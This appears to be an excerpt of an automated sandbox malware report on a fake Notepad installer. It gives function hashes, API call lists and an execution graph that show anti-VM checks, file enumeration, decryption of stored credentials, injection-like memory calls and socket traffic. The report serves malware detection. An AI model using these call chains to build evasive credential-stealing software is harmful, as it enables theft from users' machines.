                                      • Instruction Fuzzy Hash: 8151C4B4608B419FC760AF65D58461EBBE0FF84744F428C2EE4C5A7351DB39D8A48B46
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 006EB6DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24shareCOMMON
                                      Download Yara Rule
                                      APIs
                                      • WNetGetProviderNameW.MPR(00250000,?,?), ref: 006EB6FC
                                      • StrCmpIW.SHLWAPI(?,VirtualBox Shared Folders), ref: 006EB711
                                      Strings
                                      • VirtualBox Shared Folders, xrefs: 006EB70B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271913342.00000000006E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_6e0000_Notteppad_SettupX32iX64.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: NameProvider
                                      • String ID: VirtualBox Shared Folders
                                      • API String ID: 262172401-2247368375
                                      • Opcode ID: 2c5c93b46d0b914f60332ebd1f2d29f7072e452bc0e109bd417b10d4ff68977b
                                      • Instruction ID: d0aa5c79d0f1be9587699d9ec850df7a33c19c4e0ff0f28df846ba90fd24f397
                                      • Opcode Fuzzy Hash: 2c5c93b46d0b914f60332ebd1f2d29f7072e452bc0e109bd417b10d4ff68977b
                                      • Instruction Fuzzy Hash: 1EE086B165530D66DB10DB70DC5AEEB73FC5B00749F2006A1AA12E21C1E6B0DA088A91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: fprintf
                                      • String ID: [M::%s] epoch:%d running_cost:%g$sann_train
                                      • API String ID: 383729395-3640795640
                                      • Opcode ID: b2e51d20d2985bf7e3a70f1087eb507be02332b71070f51f7fcab06109c4202b
                                      • Instruction ID: 0c9632d14fcd389c7ad074f7d376c3660d3ea43504b9829637d9e9df69ab9fe7
                                      • Opcode Fuzzy Hash: b2e51d20d2985bf7e3a70f1087eb507be02332b71070f51f7fcab06109c4202b
                                      • Instruction Fuzzy Hash: 11E01A71918740DBC710DF14D94521ABBE0BB85308F92982DF4C597240C338D468CB0A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040546C Relevance: 5.1, APIs: 4, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: memcpy$_errnocalloc
                                      • String ID:
                                      • API String ID: 304464240-0
                                      • Opcode ID: d3d1a4f820d9b04bb3e5ca7db69e3af5387b71a42aa65df6cbd5c0e2f582e437
                                      • Instruction ID: 0cdd1c1ef0db81538b491fc52609e24f70015f25fa836dc24429648008b15321
                                      • Opcode Fuzzy Hash: d3d1a4f820d9b04bb3e5ca7db69e3af5387b71a42aa65df6cbd5c0e2f582e437
                                      • Instruction Fuzzy Hash: 5341D5B46047009FC714EF28D581A1ABBE1FF89310B15C96EE899DB395E734E841DF92
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405169 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: calloc
                                      • String ID:
                                      • API String ID: 2635317215-0
                                      • Opcode ID: 9704c2ddcd01101b5b3447bc0e0defe599c70d530554d4c70cf0e8d499101d78
                                      • Instruction ID: 19bc5de1db9b640ab0f14ff766f3d039f720e8b407a587cd3c6f95a40729ff9b
                                      • Opcode Fuzzy Hash: 9704c2ddcd01101b5b3447bc0e0defe599c70d530554d4c70cf0e8d499101d78
                                      • Instruction Fuzzy Hash: 2A1128F19093449FD700AF2AC54530AFFE4FF84708F45886EE9889B352D7B9D9448B96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407E30 Relevance: 5.0, APIs: 4, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?,?,?,?,0040801E), ref: 00407E3C
                                      • TlsGetValue.KERNEL32(?,?,?,?,?,0040801E), ref: 00407E55
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,0040801E), ref: 00407E5F
                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,0040801E), ref: 00407E82
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.271740599.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.271723163.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271783698.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271790744.000000000040C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271814853.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271824359.0000000000425000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271831250.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.271839623.000000000042B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Notteppad_SettupX32iX64.jbxd
                                      Similarity
                                      • API ID: CriticalSection$EnterErrorLastLeaveValue
                                      • String ID:
                                      • API String ID: 682475483-0
                                      • Opcode ID: aae4735f21bf1e8bcc53294c299d8aaa8c353e67a2084714179bf7a161977662
                                      • Instruction ID: 81857f669f084090ea1895924813cc747da55ee32d87b0419a333fe7377fe075
                                      • Opcode Fuzzy Hash: aae4735f21bf1e8bcc53294c299d8aaa8c353e67a2084714179bf7a161977662
                                      • Instruction Fuzzy Hash: FBF054B2D0A2104ADB10BF75E6C551B76A45F10744F0501BEDD805B346EB38ED49C6DB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:4.8%
                                      Dynamic/Decrypted Code Coverage:95.8%
                                      Signature Coverage:2.7%
                                      Total number of Nodes:403
                                      Total number of Limit Nodes:27
                                      execution_graph 38937 7df4b3c115a4 38938 7df4b3c115c3 38937->38938 38939 7df4b3c115b2 38937->38939 38941 7df4b3c18718 38939->38941 38950 7df4b3c17b7c 38941->38950 38943 7df4b3c18c1c 38958 7df4b3c17cc4 ??3@YAXPEAX 38943->38958 38946 7df4b3c1889a GetLogicalDrives 38948 7df4b3c18754 38946->38948 38947 7df4b3c188ab GetDriveTypeW 38947->38948 38948->38943 38948->38946 38948->38947 38949 7df4b3c1828c FindFirstFileW FindNextFileW 38948->38949 38949->38948 38951 7df4b3c17b9e 38950->38951 38959 7df4b3c22834 38951->38959 38954 7df4b3c17cae 38954->38948 38955 7df4b3c22834 NtQuerySystemInformation 38957 7df4b3c17c4c 38955->38957 38957->38954 38962 7df4b3c1d454 38957->38962 38960 7df4b3c22844 NtQuerySystemInformation 38959->38960 38961 7df4b3c17c26 38959->38961 38960->38961 38961->38954 38961->38955 38963 7df4b3c1d46f _malloc_dbg 38962->38963 38964 7df4b3c1d48a 38962->38964 38963->38964 38964->38957 38965 7df4b3c448e4 38966 7df4b3c44989 bind 38965->38966 38967 7df4b3c44908 socket 38965->38967 38971 7df4b3c44920 38966->38971 38968 7df4b3c4493b 38967->38968 38967->38971 38968->38971 38972 7df4b3c444f4 ioctlsocket 38968->38972 38970 7df4b3c44985 38970->38966 38970->38971 38973 7df4b3c44549 CreateIoCompletionPort 38972->38973 38975 7df4b3c44531 38972->38975 38974 7df4b3c44561 38973->38974 38974->38975 38976 7df4b3c44596 SetFileCompletionNotificationModes 38974->38976 38975->38970 38976->38975 38977 25aa3600000 38978 25aa360000a 38977->38978 38985 25aa36030d0 38978->38985 38980 25aa36035f7 38982 25aa36035e6 RtlDeleteBoundaryDescriptor 38982->38980 38983 25aa3603582 VirtualAlloc 38984 25aa360359d 38983->38984 38984->38982 38986 25aa3603440 38985->38986 38987 25aa3603106 38985->38987 38986->38980 38986->38983 38986->38984 38987->38986 38988 25aa3603202 RtlAllocateHeap 38987->38988 38988->38986 38989 25aa360321c 38988->38989 38989->38986 38990 25aa36032e9 RtlAllocateHeap 38989->38990 38990->38986 38991 25aa3603307 38990->38991 38997 25aa3602fec 38991->38997 38993 25aa3603435 RtlDeleteBoundaryDescriptor 38993->38986 38994 25aa3603330 38995 25aa36033de RtlAllocateHeap 38994->38995 38996 25aa36033f3 38994->38996 38995->38996 38996->38993 38998 25aa3603022 38997->38998 39001 25aa3604f60 38998->39001 39000 25aa36030bc 39000->38994 39002 25aa3604fa0 39001->39002 39004 25aa3604f96 39001->39004 39005 25aa3604f20 39002->39005 39004->39000 39006 25aa3604f36 39005->39006 39008 25aa3604f4a 39006->39008 39009 25aa3604eb0 39006->39009 39008->39004 39010 25aa3604ed8 39009->39010 39011 25aa3604f0e 39010->39011 39012 25aa3604ef4 RtlAllocateHeap 39010->39012 39011->39008 39012->39011 39013 7df4b3c18c4c RegOpenKeyExW 39014 7df4b3c18db3 39013->39014 39016 7df4b3c18c8d 39013->39016 39015 7df4b3c1d454 _malloc_dbg 39015->39016 39016->39014 39016->39015 39017 7df4b3c175ac CreateFileW 39018 7df4b3c175e6 _calloc_dbg 39017->39018 39019 7df4b3c17631 39017->39019 39018->39019 39021 7df4b3c1760c ReadFile 39018->39021 39021->39019 39022 7df4b3c1c06c 39023 7df4b3c1c0ff 39022->39023 39024 7df4b3c1c08e 39022->39024 39024->39023 39025 7df4b3c1c0cd CryptUnprotectData 39024->39025 39025->39023 39026 7df4b3c20bac 39027 7df4b3c20bdf 39026->39027 39032 7df4b3c20c20 __swprintf_l 39026->39032 39028 7df4b3c20dd7 39027->39028 39029 7df4b3c20c17 39027->39029 39027->39032 39028->39032 39036 7df4b3c115e4 39028->39036 39029->39032 39033 7df4b3c12590 39029->39033 39034 7df4b3c12599 ??3@YAXPEAX 39033->39034 39035 7df4b3c1259f 39033->39035 39034->39035 39035->39032 39037 7df4b3c11e7a 39036->39037 39038 7df4b3c11618 39036->39038 39037->39032 39038->39037 39042 7df4b3c11e2c 39038->39042 39043 7df4b3c1d454 _malloc_dbg 39038->39043 39041 7df4b3c11e4b CreateThread 39041->39037 39044 7df4b3c1d3f4 39042->39044 39043->39038 39045 7df4b3c1d407 39044->39045 39046 7df4b3c11e46 39045->39046 39047 7df4b3c1d422 ??3@YAXPEAX 39045->39047 39046->39037 39046->39041 39047->39046 39047->39047 39048 7df4b3c12b50 lstrcmpiW 39049 7df4b3c12b6e 39048->39049 39050 7df4b3c10ef4 39052 7df4b3c10f1c 39050->39052 39051 7df4b3c10f7f 39052->39051 39059 7df4b3c022e4 39052->39059 39060 7df4b3c02307 39059->39060 39061 7df4b3c02316 LoadLibraryA 39060->39061 39062 7df4b3c0236b GetProcAddressForCaller 39060->39062 39063 7df4b3c0238f 39060->39063 39061->39060 39061->39063 39062->39060 39062->39063 39063->39051 39064 7df4b3c248c8 39063->39064 39065 7df4b3c248ed 39064->39065 39076 7df4b3c244a4 39065->39076 39067 7df4b3c24946 39068 7df4b3c10f5f 39067->39068 39069 7df4b3c24c1a VirtualFree 39067->39069 39072 7df4b3c02438 39068->39072 39069->39068 39070 7df4b3c24c35 39069->39070 39070->39068 39088 7df4b3c246b4 39070->39088 39073 7df4b3c0246b SetErrorMode 39072->39073 39074 7df4b3c02445 39072->39074 39073->39051 39074->39073 39075 7df4b3c0244b RtlAddFunctionTable 39074->39075 39075->39073 39077 7df4b3c244dc 39076->39077 39078 7df4b3c245e5 __swprintf_l 39077->39078 39079 7df4b3c244e4 CreateFileW 39077->39079 39078->39067 39079->39078 39080 7df4b3c24519 _malloc_dbg 39079->39080 39082 7df4b3c245dc FindCloseChangeNotification 39080->39082 39083 7df4b3c2453c ReadFile 39080->39083 39082->39078 39084 7df4b3c2455b 39083->39084 39085 7df4b3c245d3 ??3@YAXPEAX 39083->39085 39084->39085 39086 7df4b3c24571 VirtualAlloc 39084->39086 39085->39082 39086->39085 39087 7df4b3c24593 39086->39087 39087->39085 39090 7df4b3c246ce 39088->39090 39089 7df4b3c248b4 39089->39070 39090->39089 39091 7df4b3c244a4 6 API calls 39090->39091 39093 7df4b3c246ed 39091->39093 39092 7df4b3c248a3 VirtualFree 39092->39089 39093->39089 39093->39092 39094 7df4b3cadddc 39095 7df4b3caddfe 39094->39095 39097 7df4b3cade2b 39094->39097 39096 7df4b3cade75 _malloc_dbg 39095->39096 39095->39097 39096->39097 39098 7df4b3c12677 39099 7df4b3c1267a 39098->39099 39100 7df4b3c126be 39099->39100 39107 7df4b3c238cc 39099->39107 39111 7df4b3c23aa0 39100->39111 39104 7df4b3c126d6 _calloc_dbg 39106 7df4b3c126f0 __swprintf_l 39104->39106 39105 7df4b3c126b0 ??3@YAXPEAX 39105->39099 39108 7df4b3c238f6 39107->39108 39110 7df4b3c2399d 39107->39110 39108->39110 39115 7df4b3c4db24 39108->39115 39110->39105 39112 7df4b3c23aa5 39111->39112 39113 7df4b3c126c8 39111->39113 39140 7df4b3c4d3ec 39112->39140 39113->39104 39113->39106 39118 7df4b3c4d558 39115->39118 39117 7df4b3c4dbd5 39117->39110 39119 7df4b3c4d5a5 39118->39119 39125 7df4b3c4d59b __swprintf_l 39118->39125 39120 7df4b3c4d5cb 39119->39120 39119->39125 39134 7df4b3c4cc5c _malloc_dbg ??3@YAXPEAX ??3@YAXPEAX 39119->39134 39120->39125 39126 7df4b3c2389c _malloc_dbg 39120->39126 39123 7df4b3c4d721 39123->39125 39128 7df4b3cc36cc 39123->39128 39125->39117 39127 7df4b3c238b4 39126->39127 39127->39123 39129 7df4b3cc3701 39128->39129 39133 7df4b3cc36f8 39128->39133 39130 7df4b3cc37cd _malloc_dbg 39129->39130 39129->39133 39131 7df4b3cc383f 39130->39131 39131->39133 39135 7df4b3cc1a14 39131->39135 39133->39125 39134->39120 39136 7df4b3cc1aca 39135->39136 39137 7df4b3cc1a2a 39135->39137 39136->39133 39137->39136 39138 7df4b3cc1aac ??3@YAXPEAX 39137->39138 39139 7df4b3cc1aa5 ??3@YAXPEAX 39137->39139 39138->39136 39139->39138 39141 7df4b3c4d40b 39140->39141 39142 7df4b3c4d413 39140->39142 39141->39113 39142->39141 39144 7df4b3c4cc5c _malloc_dbg ??3@YAXPEAX ??3@YAXPEAX 39142->39144 39144->39141 39145 7df4b3c167b8 39147 7df4b3c167cd 39145->39147 39146 7df4b3c1685b 39147->39146 39149 7df4b3c1f200 39147->39149 39150 7df4b3c1f235 39149->39150 39151 7df4b3c1f40c 39150->39151 39152 7df4b3c1f38e 39150->39152 39153 7df4b3c1f411 RegOpenKeyW 39150->39153 39151->39146 39157 7df4b3c1ea10 _malloc_dbg _malloc_dbg __swprintf_l 39152->39157 39153->39151 39154 7df4b3c1f42f 39153->39154 39158 7df4b3c1ea10 _malloc_dbg _malloc_dbg __swprintf_l 39154->39158 39157->39151 39158->39151 39159 7df4b3c1f9b8 39160 7df4b3c1f9d9 39159->39160 39161 7df4b3c1fac5 ??3@YAXPEAX 39160->39161 39162 7df4b3c1fad3 39161->39162 39163 7df4b3c13e3a 39172 7df4b3c22fa4 39163->39172 39165 7df4b3c13e3f 39168 7df4b3c22fa4 5 API calls 39165->39168 39169 7df4b3c13e75 39165->39169 39166 7df4b3c14086 __swprintf_l 39167 7df4b3c13fa1 MapViewOfFile 39171 7df4b3c13fc9 39167->39171 39168->39169 39169->39166 39169->39167 39171->39166 39184 7df4b3c136a0 39171->39184 39173 7df4b3c22fbb 39172->39173 39174 7df4b3c230d2 39173->39174 39208 7df4b3c22e88 39173->39208 39174->39165 39176 7df4b3c230b8 39176->39174 39177 7df4b3c230cd NtClose 39176->39177 39177->39174 39178 7df4b3c22fd6 39178->39174 39178->39176 39179 7df4b3c23038 39178->39179 39180 7df4b3c2302d NtUnmapViewOfSection 39178->39180 39179->39176 39181 7df4b3c23041 VirtualAlloc 39179->39181 39180->39179 39183 7df4b3c23061 39181->39183 39182 7df4b3c2307d NtSetInformationFile 39182->39183 39183->39176 39183->39182 39185 7df4b3c136da 39184->39185 39192 7df4b3c13c98 __swprintf_l 39185->39192 39212 7df4b3c02918 39185->39212 39187 7df4b3c13a40 39221 7df4b3c01a58 39187->39221 39189 7df4b3c13c8c 39190 7df4b3c1d3f4 ??3@YAXPEAX 39189->39190 39190->39192 39191 7df4b3c13919 39195 7df4b3c120c0 _calloc_dbg 39191->39195 39199 7df4b3c13956 39191->39199 39192->39166 39193 7df4b3c13845 39193->39187 39193->39191 39245 7df4b3c120c0 39193->39245 39195->39191 39196 7df4b3c13c2c ??3@YAXPEAX 39207 7df4b3c13c11 39196->39207 39198 7df4b3c13c57 39241 7df4b3c01aac 39198->39241 39218 7df4b3c02be8 39199->39218 39201 7df4b3c13a4a 39201->39189 39201->39207 39225 7df4b3c123e4 39201->39225 39203 7df4b3c13ba9 39232 7df4b3c1ba7c 39203->39232 39207->39196 39207->39198 39209 7df4b3c22ed8 39208->39209 39210 7df4b3c22f52 NtOpenFile 39209->39210 39211 7df4b3c22f76 __swprintf_l 39209->39211 39210->39211 39211->39178 39213 7df4b3c02bb8 __swprintf_l 39212->39213 39214 7df4b3c02952 39212->39214 39213->39193 39214->39213 39215 7df4b3c02aea _malloc_dbg 39214->39215 39215->39213 39216 7df4b3c02b03 39215->39216 39216->39213 39249 7df4b3c027e8 39216->39249 39219 7df4b3c02bf1 ??3@YAXPEAX 39218->39219 39220 7df4b3c02bf7 39218->39220 39219->39220 39220->39187 39222 7df4b3c01a68 39221->39222 39223 7df4b3c01a71 HeapCreate 39222->39223 39224 7df4b3c01a8a 39222->39224 39223->39224 39224->39201 39261 7df4b3c3f7e8 39225->39261 39227 7df4b3c1240c RegOpenKeyExW 39228 7df4b3c12437 RegQueryValueExW 39227->39228 39229 7df4b3c12472 39227->39229 39228->39229 39230 7df4b3c124ab GetVolumeInformationW 39229->39230 39231 7df4b3c124fc __swprintf_l 39229->39231 39230->39231 39231->39203 39233 7df4b3c1ba8d 39232->39233 39235 7df4b3c13bd4 CreateThread FindCloseChangeNotification 39233->39235 39263 7df4b3c1b92c 39233->39263 39236 7df4b3c43f9c 39235->39236 39240 7df4b3c43fb9 39236->39240 39237 7df4b3c43fc8 39237->39207 39240->39237 39270 7df4b3c455e8 39240->39270 39276 7df4b3c45b2c 39240->39276 39242 7df4b3c01ab8 39241->39242 39243 7df4b3c01b14 39242->39243 39244 7df4b3c01aeb HeapDestroy 39242->39244 39243->39189 39244->39243 39246 7df4b3c3f69c 39245->39246 39247 7df4b3c120d7 _calloc_dbg 39246->39247 39248 7df4b3c120ef 39247->39248 39248->39193 39250 7df4b3c02802 39249->39250 39251 7df4b3c0290a 39249->39251 39250->39251 39252 7df4b3c0280b _malloc_dbg 39250->39252 39251->39213 39252->39251 39253 7df4b3c02820 39252->39253 39254 7df4b3c02901 ??3@YAXPEAX 39253->39254 39257 7df4b3c02638 39253->39257 39254->39251 39256 7df4b3c028fe 39256->39254 39258 7df4b3c0278a __swprintf_l 39257->39258 39259 7df4b3c02662 39257->39259 39258->39256 39259->39258 39260 7df4b3c02778 _malloc_dbg 39259->39260 39260->39258 39262 7df4b3c3f7f6 39261->39262 39262->39227 39264 7df4b3c1b97f 39263->39264 39265 7df4b3c1b9ab CreateNamedPipeW 39264->39265 39266 7df4b3c1b9f3 39265->39266 39269 7df4b3c1ba35 __swprintf_l 39265->39269 39267 7df4b3c1ba0c BindIoCompletionCallback 39266->39267 39268 7df4b3c1ba24 ConnectNamedPipe 39267->39268 39267->39269 39268->39269 39269->39233 39271 7df4b3c456b7 39270->39271 39274 7df4b3c45615 39270->39274 39273 7df4b3c4570a WSARecv 39271->39273 39275 7df4b3c45797 39271->39275 39273->39271 39273->39275 39274->39240 39275->39274 39280 7df4b3c44d7c 39275->39280 39277 7df4b3c45b43 39276->39277 39278 7df4b3c45baa 39277->39278 39279 7df4b3c45b83 setsockopt 39277->39279 39278->39240 39279->39278 39281 7df4b3c44da1 39280->39281 39282 7df4b3c44ddb WSARecv 39281->39282 39283 7df4b3c44e25 39282->39283 39283->39274 39284 7df4b3c123bc 39287 7df4b3c17dd4 39284->39287 39300 7df4b3c82230 39287->39300 39290 7df4b3c17b7c 2 API calls 39291 7df4b3c17df6 39290->39291 39292 7df4b3c17e59 39291->39292 39315 7df4b3c1782c 39291->39315 39310 7df4b3c16e1c 39292->39310 39295 7df4b3c17ec3 39324 7df4b3c17cc4 ??3@YAXPEAX 39295->39324 39301 7df4b3c8224c 39300->39301 39303 7df4b3c17de4 39300->39303 39301->39303 39304 7df4b3c822f6 __swprintf_l 39301->39304 39330 7df4b3c71170 GetSystemInfo __swprintf_l 39301->39330 39303->39290 39304->39303 39307 7df4b3c82444 39304->39307 39331 7df4b3c7bcc4 GetSystemInfo __swprintf_l 39304->39331 39307->39303 39325 7df4b3c59468 GetSystemInfo __swprintf_l 39307->39325 39308 7df4b3c82471 __swprintf_l 39308->39303 39326 7df4b3c71c6c 39308->39326 39311 7df4b3c16e35 39310->39311 39312 7df4b3c16e79 39310->39312 39332 7df4b3c16b20 39311->39332 39312->39295 39314 7df4b3c16e60 ??3@YAXPEAX 39314->39311 39314->39312 39316 7df4b3c1785b 39315->39316 39317 7df4b3c17971 __swprintf_l 39316->39317 39318 7df4b3c17893 FindFirstFileW 39316->39318 39317->39292 39318->39317 39321 7df4b3c178ae 39318->39321 39319 7df4b3c17952 FindNextFileW 39320 7df4b3c17968 FindClose 39319->39320 39319->39321 39320->39317 39321->39319 39323 7df4b3c1782c _malloc_dbg 39321->39323 39345 7df4b3c1774c _malloc_dbg 39321->39345 39323->39321 39325->39308 39327 7df4b3c3f690 39326->39327 39328 7df4b3c71c82 GetSystemInfo 39327->39328 39329 7df4b3c71ca0 __swprintf_l 39328->39329 39329->39303 39331->39307 39334 7df4b3c16b44 39332->39334 39333 7df4b3c16e01 39333->39314 39334->39333 39339 7df4b3c16d9b 39334->39339 39343 7df4b3c239d4 _malloc_dbg 39334->39343 39335 7df4b3c1d3f4 ??3@YAXPEAX 39335->39333 39337 7df4b3c16d2f 39338 7df4b3c16d8c 39337->39338 39337->39339 39342 7df4b3c238cc 4 API calls 39337->39342 39344 7df4b3c23dac _malloc_dbg ??3@YAXPEAX ??3@YAXPEAX _malloc_dbg 39337->39344 39340 7df4b3c23aa0 3 API calls 39338->39340 39339->39335 39340->39339 39342->39337 39343->39337 39344->39337 39345->39319 39346 7df4b3c13cdc 39347 7df4b3c13ce0 39346->39347 39359 7df4b3c1e130 39347->39359 39349 7df4b3c13d0a 39351 7df4b3c13e59 39349->39351 39354 7df4b3c13d38 39349->39354 39350 7df4b3c13e75 39352 7df4b3c13fa1 MapViewOfFile 39350->39352 39356 7df4b3c13d54 __swprintf_l 39350->39356 39351->39350 39353 7df4b3c22fa4 5 API calls 39351->39353 39358 7df4b3c13fc9 39352->39358 39353->39350 39354->39356 39365 7df4b3c216a8 22 API calls 39354->39365 39357 7df4b3c136a0 21 API calls 39357->39356 39358->39356 39358->39357 39362 7df4b3c1e144 39359->39362 39360 7df4b3c1e195 VirtualProtect 39363 7df4b3c3f5d2 39360->39363 39361 7df4b3c1e1d8 39361->39349 39362->39360 39362->39361 39364 7df4b3c1e1c2 VirtualProtect 39363->39364 39364->39361 39365->39356 39366 7df4b3c1b2dc 39367 7df4b3c1b2fe 39366->39367 39370 7df4b3c1f820 39367->39370 39369 7df4b3c1b3fd 39371 7df4b3c1f846 39370->39371 39372 7df4b3c1f8b4 39371->39372 39373 7df4b3c1f85d 39371->39373 39376 7df4b3c1f84e __swprintf_l 39371->39376 39377 7df4b3c45ff4 39372->39377 39373->39376 39381 7df4b3c46044 ioctlsocket CreateIoCompletionPort SetFileCompletionNotificationModes socket bind 39373->39381 39376->39369 39378 7df4b3c45ffe 39377->39378 39380 7df4b3c4601a 39377->39380 39378->39380 39382 7df4b3c44fd8 39378->39382 39380->39376 39381->39376 39383 7df4b3c45016 39382->39383 39385 7df4b3c44ffe 39382->39385 39383->39385 39386 7df4b3c45f48 ioctlsocket CreateIoCompletionPort SetFileCompletionNotificationModes socket bind 39383->39386 39385->39380 39386->39385 39387 7ffc288e1620 lstrlenA 39388 7ffc288e1658 39387->39388 39389 7ffc288e1670 LocalAlloc 39388->39389 39390 7ffc288e165c 39388->39390 39389->39390 39391 7ffc288e168f 39389->39391 39392 7ffc288e16c0 LocalAlloc 39391->39392 39393 7ffc288e16ae LocalFree 39391->39393 39394 7ffc288e182b 39392->39394 39399 7ffc288e16dd LocalFree 39392->39399 39393->39390 39395 7ffc288e1832 LocalFree 39394->39395 39395->39390 39397 7ffc288e1850 LocalAlloc 39397->39395 39398 7ffc288e186b memcpy LocalFree CreateFileMappingW 39397->39398 39400 7ffc288e1914 LocalFree 39398->39400 39401 7ffc288e18b7 MapViewOfFile 39398->39401 39399->39395 39399->39397 39400->39390 39402 7ffc288e190b CloseHandle 39401->39402 39403 7ffc288e18dc memcpy 39401->39403 39402->39400 39404 7ffc288e1902 UnmapViewOfFile 39403->39404 39404->39402 39405 7df4b3c1f6dc 39406 7df4b3c1f714 39405->39406 39409 7df4b3c443c0 39406->39409 39408 7df4b3c1f778 __swprintf_l 39410 7df4b3c443e3 39409->39410 39411 7df4b3c443d2 39409->39411 39410->39411 39413 7df4b3c45384 39410->39413 39411->39408 39414 7df4b3c453cc 39413->39414 39415 7df4b3c4540b WSASend 39414->39415 39416 7df4b3c45449 39415->39416 39416->39411 39417 7df4b3c1b760 39418 7df4b3c1b7ee 39417->39418 39421 7df4b3c1b769 39417->39421 39419 7df4b3c1b7c9 39419->39418 39422 7df4b3c1b92c 3 API calls 39419->39422 39420 7df4b3c1b7f0 ??3@YAXPEAX 39420->39418 39421->39418 39421->39419 39421->39420 39422->39419 39423 7df4b3c1d200 39424 7df4b3c1d2ca _malloc_dbg 39423->39424 39425 7df4b3c1d220 39423->39425 39428 7df4b3c1d267 39424->39428 39425->39424 39426 7df4b3c1d23d 39425->39426 39427 7df4b3c1d28b _malloc_dbg 39426->39427 39426->39428 39427->39428

                                      Executed Functions

                                      Function 00007FFC288E1620 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 207memorystringCOMMONCrypto
                                      Download Yara Rule

                                      Control-flow Graph

                                      C-Code - Quality: 72%
                                      			E00007FFC7FFC288E1620(void* __eflags, void* __r8) {
				char _v80;
				long long _v120;
				void* _t4;
				void* _t9;
				void* _t11;
				void* _t18;

				_v120 = lstrlenA();
				_t4 = E00007FFC7FFC288E13A0(0, _t9, __r8, _t11,  &_v80, __r8, _t18);
				if (_t4 != 0) goto 0x288e1670;
